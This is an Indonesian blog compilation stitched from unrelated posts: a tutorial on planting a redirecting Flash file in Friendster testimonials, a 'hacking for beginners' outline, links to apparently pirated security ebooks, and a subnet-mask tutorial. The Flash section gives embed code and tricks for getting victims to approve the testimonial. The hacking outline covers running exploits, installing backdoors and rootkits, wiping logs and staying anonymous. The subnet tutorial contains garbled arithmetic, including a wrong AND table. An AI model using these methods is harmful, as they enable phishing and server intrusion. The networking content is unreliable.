Jika berhasil, maka akan dihasilkan file Flash bernama out.swf. File ini ketika diakses dari browser, akan me-redirect ke URL yang kita definisikan sebelumnya. Contohnya silahkan akses flash yang telah saya buat disini. Apabila anda mengakses url tersebut, maka anda langsung ‘diarahkan’ menuju http://chaidir.wordpress.com.

Selanjutnya upload file flash tadi (out.swf) ke tempat yang mudah diakses. Misalkan di http://numpang.com/out.swf. Setelah itu, kirim testimonial ke orang yang ingin di berikan testimonial dengan memasukkan file flash ini.

Jangan mengirimkan testimonial ini keteman anda, karena profile teman anda tidak akan bisa diakses!

Caranya masukkan kode berikut :


27CDB6E-AE6D-11cf-96B8-444553540000′ codebase=’http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0′ width=’400′ height=’250′>http://numpang.com/out.swf‘ />http://numpang.com/out.swf‘ quality=’high’ pluginspage=’http://www.macromedia.com/go/getflashplayer’ type=’application/x-shockwave-flash’ width=’400′ height=’250′ allowScriptAccess=”never”>

Untuk mencoba apakah testimonial ini berhasil, klik priview. Agar sang penerima testimonial bisa meng-approve testimonial, hapus ganti file flash tadi terlebih dahulu (http://numpang.com/out.swf) dengan flash animasi yang menarik perhatian. Misalnya dengan flash dari Babaflash Forum. Baru setelah di approve, aktifkan ganti lagi (upload lagi) dengan file flash tadi.

Nah, dalam contoh kasus di Friendster palsu, sang cracker me-redirect setiap user yang ingin melihat profile yang sudah disusupi flash tadi dan mengarahkannya ke http://www.friendster.co.nr. Dan celakanya disitu dibuat halaman yang menyerupai halaman login Friendster dan seolah-olah terjadi kesalahan yang mengharuskan setiap user memasukkan email dan passwordnya.

‘Fasilitas’ untuk mengirimkan testimonial di Friendster inilah yang dimanfaatkan cracker untuk ‘mengelabuhi’ orang-orang yang sering bermain-main dengan Friendster. Oleh karena itu, berhati-hatilah terhadap testimonial yang menggunakan flash. Jika mendapatkan testimonail dari orang yang tidak dikenal (emang bisa ya?) atau flash yang ngga penting, lebih baik tidak usah di approve aja.

Pesan buat anak2 ABG pecinta Friendster :

Dan buat anak2 ABG yang sering ke warnet hanya untuk ber-Friendster ria.. apakah tidak ada aktivitas lain di internet selain ber-Friendsteran?! Sangat sayang sekali jika kamu ke warnet cuman liat cowo2 ato cewe2 yang friendsterGenic (keren di friendster doang!) Mendingan belajar cari informasi yang menarik atau belajar apapun dari Internet. Atau lebih baik lagi klo kamu buat buat blog sendiri. Selain belajar nulis, kamu kan juga bisa nambah temen baru. Rugi loh klo bayar 3000 - 4000 perak cuman buat ngeliat Friendster doang, mendingan buat beli bakso!

Referensi :

http://ezinearticles.com/?Redirect-Your-MySpace-Traffic-With-Flash&id=364276

Sekilas info :

ternyata http://www.friendster.co.nr dah diubah toh… hihihi :-D .



hacking buat pemula

Apa sebenarnya hacking itu? klo menurut pengertian gue, hacking adalah ngoprek. Yup, hacking adalah ngoprek, mempelajari sesuatu dengan keingintahuan (curiosity) yg tinggi, ngutak atik sesuatu, ‘ngudek-ngudek’ sampai ke ‘jeroannya’. Sesuatunya apa dong? ya terserah… bisa komputer, mobil, motor, mesin. Tapi masalahnya ada ngga ya hacker mobil, hacker motor, atau hacker pesawat terbang?? hehe… Walaupun saat ini hacking identik dengan ‘bobol-membobol’, tapi gue kurang setuju klo cuman bobol server orang doang!. Ada yang bilang ‘Hacking is Art’, trus dimana letak seninya dong? Mau tau pengertian hacking sebenarnya, coba baca artikel sebelumnya (How to Become A Hacker). Di situ dijelasin bahwa hacker berkaitan dengan kemahiran teknis serta kegemaran menyelesaikan masalah dan mengatasi keterbatasan. Contoh hacker pada saat ini yang sering-sering disebut adalah Linus Torvald (tau ngga? itu lho yang menciptakan Linux). Apa dia tukang bobol? belum tentu kan….

Pada artikel ini, gue pengen membagi pengalaman mengenai Hacking, walaupun sampai saat ini gue belum pernah nge-Hack ke server orang. Salah satu cara untuk mencoba simulasi Hack yaitu H3cky0uRs3lf! Buat komputer kita sebagai server (sekaligus belajar konfigurasi server) trus install program yg dibutuhkan. Misalnya klo mo Web Hacking, coba install Apache atau IIS. Atau kita sesuaikan dengan exploit yang udah kita dapet. Tapi lebih baik install Linux atau FreeBSD dulu di komputer pribadi, trus konfigurasi sebagai server, lalu simulasi Hack, setelah itu baru Hack Betulan… Apalagi klo di kost ada jaringan.

Pro dan Kontra Hacking

Pro

Kontra

Etika Hacking

Semua informasi adalah free

Jika semua informasi adalah free, maka tidak ada ladi privacy

Aspek Security

Intrusion adalah ilustrasi kelemahan sistem

Tidak perlu menjadi pencuri untuk menunjukkan pintu yang tidak terkunci

Idle Machines

Hacking hanya pada idle machines

idle machines milik siapa ?

science education

hanya membobol tapi tidak merusak

“hacker wannabe” berpotensi sangat besar untuk merusak

Okeh, sekarang waktunya melakukan aksi…


1. Fase Persiapan

~ Mengumpulkan informasi sebanyak-banyaknya

- Secara Aktif : - portscanning

- network mapping

- OS Detection

- application fingerprinting

Semua itu bisa dilakukan menggunakan toolz tambahan seperti nmap atau netcat

- Secara Pasif : - mailing-list (jasakom, newbie_hacker, hackelink, dsb)

- via internet registries (informasi domain, IP Addres)

- Website yang menjadi terget



2. Fase Eksekusi
~ Setelah mendapatkan informasi, biasanya akan didapatkan informasi mengenai OS yg digunakan, serta port yang terbuka dengan daemon yg sedang berjalan. Selanjutnya mencari informasi mengenai vulnerability holes (celah kelemahan suatu program) dan dimanfaatkan menggunakan exploit (packetstromsecurity.org, milw0rm, milis bugtraq, atau mencari lewat #IRC).
~ Mengekspolitasi Vulnerability Holes
- compile eksploit -> local host ->

$gcc -o exploit exploit.c

$./exploit

# hostname (# tanda mendapatkan akses root)

remote host -> $gcc -o exploit exploit.c

$./exploit -t www.target.com

# (klo beruntung mendapatkan akes root)

~ Brute Force

- Secara berulang melakukan percobaan otentifikasi.

- Menebak username dan password.

- Cracking password file

~ Social Engineering

- Memperdayai user untuk memeberi tahu Username dan password

- Intinya ngibulin user….



3. Fase Setelah Eksekusi

~ Menginstall backdoor, trojans, dan rootkit

~ Menghapus jejak dengan memodifikasi file log agar tidak dicurigai admin

~ Menyalin /etc/passwd atau /etc/shadow/passwd

Nah, intinya seh cara masuk ke server seseorang seperti fase diatas. Mencari informasi, temukan exploit, dan tinggalkan backdoor. Cuma masalahnya hacking bukanlah segampang cara-cara diatas. Itu hanyalah teori, banyak hal yang harus diperhatikan jika ingin mempraketekkan hacking ke server seseorang. Jangan sekali-kali mencoba2 hacking ke server orang tanpa memperhatikan anonimitas (apalagi klo connectnya lewat komputer pribadi tanpa menggunakan proxy). Ntar klo ketahuan bisa repot. Saran gue, cobalah pada mesin localhost dulu (komuter pribadi), klo terhubung ke LAN lebih bagus. Sediakan server yang khusus buat dioprek. Kalaupun pun ga terhubung ke jaringan, kita masih bisa menggunakan Virtual Machine menggunakan VMWare seperti yang nanti akan dibahas pada bagian 3!



Referensi :

-Hacking and Defense, Jim Geovedi, negative@magnesium.net

-Network Defense, Jim Geovedi, negative@magnesium.net

ni tutorial buat jadi hacker

buka aja web dibawah ini

A Buffer Overflow Study - Attacks and Defenses (2002).pdf 470kbs
http://rapidshare.de/files/2305162/A_Buffer_Overflow_Study_-_Attacks_and_Defe...

Amazon Hacks - (O'reilly-August 2003).chm 2.83megs
http://rapidshare.de/files/1001242/O_Reilly_-_Amazon_Hacks__2003___TeaM_LiB__...

Computer Vulnerability(March 9 2000).pdf 390kbs
http://rapidshare.de/files/2305190/Computer_Vulnerability_March_9_2000_.pdf.html

Crackproof Your Software(No Starch-2002).pdf 7.17megs
http://rapidshare.de/files/2305234/Crackproof_Your_Software_No_Starch-2002_.p...

Credit Card Visa Hack(Cambridge Lab-2003).pdf 223kbs
http://rapidshare.de/files/2305239/Credit_Card_Visa_Hack_Cambridge_Lab-2003_....

Google Hacking for Penetration Tester (Syngress-2005).pdf 13.7megs
http://rapidshare.de/files/2317399/Google_Hacking_for_Penetration_Tester__Syn...

Hack Attacks Revealed- A Complete Reference with Custom Security Hacking Toolkit (Wiley-2001).pdf 8.25megs
http://rapidshare.de/files/2317485/Hack_Attacks_Revealed-_A_Complete_Reference

Hack IT Security Through Penetration Testing (Addison Wesley-2002).chm 4.96megs
http://rapidshare.de/files/2317600/Hack_IT__Security_Through_Penetration_Test...

Hack Proofing Your Identity in the Information Age (Syngress-2002).pdf 9.11megs
http://rapidshare.de/files/2317737/Hack_Proofing_Your_Identity_in_the_Informa...

Hack Proofing Your Network - Internet Tradecraft (Syngress-2000).pdf 2.94megs
http://rapidshare.de/files/2329542/Hack_Proofing_Your_Network_-_Internet_Trad...

Hacker Disassembling Uncovered (A List- 2003).chm 4.72megs
http://rapidshare.de/files/2329577/Hacker_Disassembling_Uncovered__A_List-_20...

Hackers Beware (NewRiders -2002).pdf 4.62megs
http://rapidshare.de/files/2329607/Hackers_Beware__NewRiders_-2002_.pdf.html

Hackers Delight( Addison Wesley- 2003 ).chm 2.11megs
http://rapidshare.de/files/2329626/Hackers_Delight__Addison_Wesley-_2003__.ch...

Hacker's Desk Reference.pdf 744kbs
http://rapidshare.de/files/2329629/Hacker_s_Desk_Reference.pdf.html

Hacking Exposed- Network Security Secrets and Solutions (MCGraw-Hill-2001).pdf 8.04megs
http://rapidshare.de/files/2369818/Hacking_Exposed-_Network_Security_Secrets_...

Hacking Exposed- Web Applications (MCGraw-Hill-2002).pdf 7.76megs
http://rapidshare.de/files/2369872/Hacking_Exposed-_Web_Applications__MCGraw-...

Hacking Exposed- Windows 2003 Chapter 5.pdf 916kbs
http://rapidshare.de/files/2369895/Hacking_Exposed-_Windows_2003_Chapter_5.pd...

Hacking for Dummies (John Wiley-2004).pdf 9.50megs
http://rapidshare.de/files/2369943/Hacking_for_Dummies__John_Wiley-2004_.pdf....

Hacking Guide v3.1[www.netz.ru].pdf 1.22megs
http://rapidshare.de/files/2382155/Hacking_Guide_v3.1_www.netz.ru_.pdf.html

Hacking-The Art of Exploitation(No Starch-2003).chm 1.43megs
http://rapidshare.de/files/411679/Hacking_-_The_Art_of_Exploitation.chm.html

How Thieves Targeted eBay Users but Got Stopped Instead(Interhack-June 2003).pdf 200kbs
http://rapidshare.de/files/2382182/How_Thieves_Targeted_eBay_Users_but_Got_St...

Malware - Fighting Malicious Code (Prentice Hall-November 21 2003).chm 6.49megs
http://rapidshare.de/files/2382239/Malware_-_Fighting_Malicious_Code__Prentic...

Maximum Security, 3rd Edition(Sams-April 2001).chm 2.21megs
http://rapidshare.de/files/2382271/Maximum_Security__3rd_Edition_Sams-April_2...

Maximum Security_-A Hackers Guide to Protect Your Internet .chm 1.31megs
http://rapidshare.de/files/2382285/Maximum_Security_-A_Hackers_Guide_to__Prot...

Network Security Tools (OReilly- Apr 2005).chm 1.32megs
http://rapidshare.de/files/2382318/Network_Security_Tools__OReilly-_Apr_2005_...

PC Hacks(Oct 2004).chm 6.10megs
http://rapidshare.de/files/1437885/OReilly.PC.Hacks.Oct.2004.eBook-DDU.chm.html

PDF Hack(Aug 2004).chm 3.61megs
http://rapidshare.de/files/1693887/OReilly.PDF.Hacks.Aug.2004.eBook-DDU.chm.html

Practical Study Remote Access (Cisco-December 22, 2003).chm 2.50megs
http://rapidshare.de/files/2382422/Practical_Study_Remote_Access__Cisco-Decem...

Reversing Secrets of Reverse Engineering (Apr 2005).pdf 8.37megs
http://rapidshare.de/files/2369197/Wiley.Reversing.Secrets.of.Reverse.Enginee...

Secrets To Winning Cash Via Online Poker.pdf 233kbs
http://rapidshare.de/files/2394511/Secrets_To_Winning_Cash_Via_Online_Poker.p...

Spidering Hacks(O'Reilly- October 2003).chm 1.38megs
http://rapidshare.de/files/1000252/OReilly.Spidering.Hacks.chm.html

Stealing the Network; How to Own the Box ( Syngress-2003).pdf 4.58megs
http://rapidshare.de/files/714044/Stealing_the_Network_How_to_Own_the_Box.pdf...

The Art of Deception by Kevin Mitnick.pdf 5.19megs
http://rapidshare.de/files/2394816/The_Art_of_Deception_by_Kevin_Mitnick.pdf....

The Art of Intrusion-The Real Stories Behind the Exploits of Hackers Intruders and Deceivers (Wiley- Feb 2005).pdf 3.06megs
http://rapidshare.de/files/985113/The_Art_of_Intrusion.pdf.html

The Complete History of Hacking.pdf 135kbs
http://rapidshare.de/files/2394847/The_Complete_History_of_Hacking.pdf.html

Tricks of the Internet Gurus (April 1999).pdf 5.66megs
http://rapidshare.de/files/2394924/Tricks_of_the_Internet_Gurus__April_1999_....

Underground Hacking Madness & Obsession on the Electronic Frontier.pdf 1.47megs
http://rapidshare.de/files/2394936/Underground_Hacking_Madness___Obsession_on...

Web Hacking- Attacks and Defence (Pearson Education-August 08, 2002).chm 6.32megs
http://rapidshare.de/files/2394976/Web_Hacking-_Attacks_and_Defence__Pearson_...

Windows Server Hack(O'Reilly - March 2004).chm 1.82megs
http://rapidshare.de/files/1693872/OReilly.Windows.Server.Hacks.eBook-DDU.chm...

Windows XP Hacks (O'reilly- Auguest 2003).chm 5.18megs
http://rapidshare.de/files/1693126/O_Reilly_-_Windows_XP_Hacks.chm.html

Rabu, 21 Januari 2009

subnetmask







Network ID dan Host ID di subnet mask
Apa itu subnet-mask?……, Menurut mbah wiki subnet-mask itu adalah metode untuk menghilangkan atau menopengi jatah(istilah yang kacau) network address dan IP Address. jika anda bingung untuk mengerti bahasa saya coba tanya langsung ke mbah wiki mungkin anda akan lebih mengerti klo dia langsung yang menjelasi.
IP address itu sendiri terdiri dari dua bagian yaitu network id dan host id, jadi fungsi dari subnet-mask ini untuk menentukan sebatas mana network anda dan berapa host yang bisa anda pake pada network anda tersebut.
Karena komputer hanya mengerti 0 dan 1 (bego ya?), atau bilangan biner maka subnet-mask itu di bentuk menggunakan bilangan biner. Subnet-mask terdiri dari 4 byte dan karena 1 byte = 8 bit, maka subnet-mask tersebut terdiri dari 32 bit.
beginilah bentuk subnet-mask yang di baca oleh komputer 11111111.11111111.11111111.11111111, karena manusia akan repot jika membaca biner, akhirnya komputer meng-conversi-nya ke bilangan desimal ketika akan di tampilkan ke user(kita-kita nih), *buka kalkulator sciencetific* jadi hasil bilangan biner yang di atas setelah kita conversi-kan ke desimal adalah 255.255.255.255(gampang bukan, emang gampang untuk conversi biner ke desimal dengan menggunakan kalkulator).
Anda bisa dengan mudah menconversi biner ke desimal atau sebaliknyaa dengan menggunakan kalkulator sciencetific, bila terlalu mahal untuk membelinya, jika anda pengguna windows, anda bisa mendapatkannya di start menu—> programs —> accessories—>calculator, di calculator anda pilih menu view lalu pilihlah sciencetific.
Tapi walaupun sangat mudah menggunakan kalkulator, ada baiknya klo kita juga tahu bagaimana cara mengkonversinya secara manual, tapi jika anda tidak membutuhkannya ya gak masalah he..he..he, tapi mungkin ada yang lain juga pingin tahu caranya melakukannya tanpa bantuan kalkulator sciencetific,
seperti yang kita ketahui 1 byte itu adalah 8 bit, jadi jika kita tuliskan satu byte maka dalam binernya seperti ini :
1 1 1 1 1 1 1 1
untuk meng-konversi bilangan biner di atas menjadi bilangan desimal, yang perlu kita lakukan adalah mengalikan semua bilangan dengan 2 lalu hasilnya kita pangkatkan, bilangan paling kanan di pangkatkan dengan 0, bilangan kedua dari kanan dengan 1 bilangan ketiga dengan 2 dan seterusnya, mari kita lakukan :
(2 x 1) pangkat 0 = 1
(2 x 1) pangkat 1 = 2
(2 x 1) pangkat 2 = 4
(2 x 1) pangkat 3 = 8
(2 x 1) pangkat 4 = 16
(2 x 1)pangkat 5 = 32
(2 x 1)pangkat 6 = 64
(2 x 1)pangkat 7 = 128
jadi jika kita jumlahkan 1 + 2 + 4 + 8 + 16 + 32 + 64 + 128 = 255
seumpama contoh
1 0 1 0 1 0 0 0
maka,
(2 x 0) pangkat 0 = 0
(2 x 0) pangkat 1 = 0
(2 x 0) pangkat 2 = 0
(2 x 1) pangkat 3 = 8
(2 x 0) pangkat 4 =0
(2 x 1) pangkat 5 = 32
(2 x 0) pangkat 6 = 0
(2 x 1) pangkat 7 = 128
jadi totalnya adalah : 0 + 0 + 0 + 8 + 0 +32 + 0 + 128 = 168
Tapi bagaimanapun contoh sangat di perlukan untuk memperlajari sesuatu, makanya kita akan memulai dengan contoh, anggap kita mempunyai ip kelas c yaitu 192.168.0.0, dengan memberikan subnetmask 255.255.255.0 maka kita akan mendapatkan 256 ip, satu akan di gunakan sebagai network yaitu 192.168.0.0 dan yang satunya lagi di pakai buat broadcast 192.168.0.255, jadi anda mempunyai 254 ip yang bisa di gunakan oleh user anda.
catatan : dalam subnet-mask ini, bit 1 berarti terisi dan bit 0 berarti kosong.
Supaya kita gak bingung, kita akan membahas gimana kita bisa mendapatkan yang di atas. karena komputer hanya mengerti biner, lebih baik kita membahasnya dengan biner pula,
192.168.0.0 = 11000000.10101000.00000000.00000000
255.255.255.0 = 11111111.11111111.11111111.00000000
sekarang kita telah memiliki ip dan subnet yang telah di konversi ke biner. sekarang mari kita AND (’&’) kan mereka. baik sebelonya kita lihat status AND untuk biner dulu :
1 AND 1 = 11 AND 0 = 00 AND 1 = 00 AND 0 = 1
maka,
1 1 0 0 0 0 0 0. 1 0 1 0 1 0 0 0. 0 0 0 0 0 0 0 0.0 0 0 0 0 0 0 0
1 1 1 1 1 1 1 1. 1 1 1 1 1 1 1 1. 1 1 1 1 1 1 1 1. 0 0 0 0 0 0 0 0=yang akan menjadi network1 1 0 0 0 0 0 0 .1 0 1 0 1 0 0 0. 0 0 0 0 0 0 0 0. 0 0 0 0 0 0 0 0 = 192.168.0.0
dari contoh di atas, kita ingin mencari di mana bagian network dan host dari ip tersebut. Kita mengambil bit 1 terakhir dari subnet-mask yang menjadi acuan, jadi :
1 1 0 0 0 0 0 0. 1 0 1 0 1 0 0 0. 0 0 0 0 0 0 0 0.0 0 0 0 0 0 0 0
1 1 1 1 1 1 1 1. 1 1 1 1 1 1 1 1. 1 1 1 1 1 1 1 1. 0 0 0 0 0 0 0 0
setelah kita and kan mereka akhirnya kita mendapatkan
1 1 0 0 0 0 0 0. 1 0 1 0 1 0 0 0. 0 0 0 0 0 0 0 0.0 0 0 0 0 0 0 0 ———> network
1 1 0 0 0 0 0 0. 1 0 1 0 1 0 0 0. 0 0 0 0 0 0 0 0.¦1 1 1 1 1 1 1 1 ——–> broadcast
catata, untuk mencari network yang di belakang batasan tadi di gantikan dengan 0 semua, dan untuk broadcast kita gantikan dengan 1 semua, tanda ini di ambil ‘ ‘ dengan paktokan 1 terakhir pada subnet kita.
jadi sisa ip di antara 0 dan 255 itu bisa di pakai oleh user anda yaitu 1 sampai dengan 254.
masih bingung?????????
oke kita buat satu lagi contoh
Pada contoh ini kita akan tetap menggunakan ip 192.168.0.66 dengan subnet 255.255.255.192, jadi
ip
1 1 0 0 0 0 0 0. 1 0 1 0 1 0 0 0. 0 0 0 0 0 0 0 0. 0 1 0 0 0 1 0
subnet-mask
1 1 1 1 1 1 1 1. 1 1 1 1 1 1 1 1. 1 1 1 1 1 1 1 1. 1 1 0 0 0 0 0 0
jadi angka 1 terakhir dari subnet-mask jadi acuan kita, setelah kita meng AND mereka
1 1 0 0 0 0 0 0. 1 0 1 0 1 0 0 0. 0 0 0 0 0 0 0 0. 0 1 0 0 0 0 1 0
1 1 1 1 1 1 1 1. 1 1 1 1 1 1 1 1. 1 1 1 1 1 1 1 1. 1 1 0 0 0 0 0 0
sama dengan,
1 1 0 0 0 0 0 0. 1 0 1 0 1 0 0 0. 0 0 0 0 0 0 0 0. 0 1 0 0 0 0 0 0 = network
1 1 0 0 0 0 0 0. 1 0 1 0 1 0 0 0. 0 0 0 0 0 0 0 0. 0 1 1 1 1 1 1 1 = broadcast
jadi kita mendapatkan 192.168.0.64 sebagai network dan 192.168.0.127 sebagai broadcast.
memang agak memusingkan, tapi akan semakin mudah jika anda biasa menggunakannya.
Prefix Subnet-mask
Mungkin anda pernah menjumpai ip yang seperti ini 192.168.0.1/24, ini sama saja jika kita tulis 192.168.0.1 dengan subnetnya 255.255.255.0 (mank….I need demank).
192.168.0.1/24, jadi /24 di sini bahasa kerennya Prefix sebenarnya saya tahu juga dari demank ketika lagi ngopi di solong(ini bukan lyric nyanyi Gary Moore), lagi ngomong2 dia bilang klo ada /24 itu namanya Prefix.
Bagi yang belon ngerti dengan cara menentukan Prefix ini saya akan coba membantu sebisa saya, jadi seperti yang kita bahas di atas, klo subnet itu mempunya 32 bit. jadi Prefix itu sendiri di ambil dari bit-bit subnet tadi, jadi klo ada subnet 255.255.0.0 itu berarti /16 karena 255.255.0.0 jumlah bitnya adalah 16.
saya rasa kita tidak punya masalah dengan Prefix lagi, soalnya paragraf di atas itu sudah cukup menjelaskan.
Menentukan Jumlah network dalam subnet class C
jadi kalo kita kita menggunakan 192.168.1.1/25, atau sama dengan 192.168.1.1 255.255.255.128 , disini kita membelah class C menjadi 2 bagian yaitu dari 0 sampai 127 dan 128 sampai 255. jadi kita mempunya network id 192.168.1.0 dan broadcast 192.168.1.127 dan satu lagi network 192.168.1.128 dan 192.168.1.255 untuk broadcastnya.
untuk mengetahui jumlah block subnet kita menggunakan formula 2 pangkat dengan n, yang mana n itu adalah jumlah satu pada block ke empat jika kita menggunakan subnet mask pada class C, tapi jika pada class B kita n itu adalah jumlah angka 1 pada block 3 dan 4, dan jika pada class A maka n adalah jumlah angka 1 pada block 2, 3 dan 4.
jadi pada contoh di atas, class c mempunyai netmask 255.255.255.0 jika kita melakukan subnet pada class c, seumpama kita menggunakan 255.255.255.192 berarti kita meminjam 2 bit, karena secara biner netmask di atas kita tulis,
1 2 3 411111111.11111111.11111111.00000000
jadi untuk mengubahnya ke menjadi 255.255.255.192 kita harus meminjamkan dua bit,
11111111.11111111.11111111.11000000,
sekarang kita melihat ada dua angka 1 pada block ke 4, jadi nilai angka n adalah 2, sekarang masukan ke formula 2 pangkat n, jadinya 2 pangkat 2 = 4. jadi kita mempunya 4 block subnet sekarang ini. jadi klo kita menggunakan ip 192.168.1.0.
untuk menghitung jumlah host pada jaringan kita di dengan subnet class C, anda bisa menggunakan formula ini, 2 pangkat angka 0 pada block ke 4 dan di kurang dengan 2 .
jadi pada contoh di atas, (2 pangkat 6) yaitu 64 lalu di kurang 2, jadinya 62 host yang bisa kita gunakan per block subnet.
setelah kita mendapatkan berapa jumlah block subnet kita, kita juga telah mendapatkan berapa host, sekarang kita bisa menentukan yang mana network id dan broadcast id pada contoh di atas dan kita tulis pada table berikut ini.



sampai di sini tulisan saya ini, ini sebenarnya saya tulis untuk mengingatkan saya tentang subnet ini. jika yang salah dari tulisan saya ini, saya sangat berharap petunjuknya dari anda.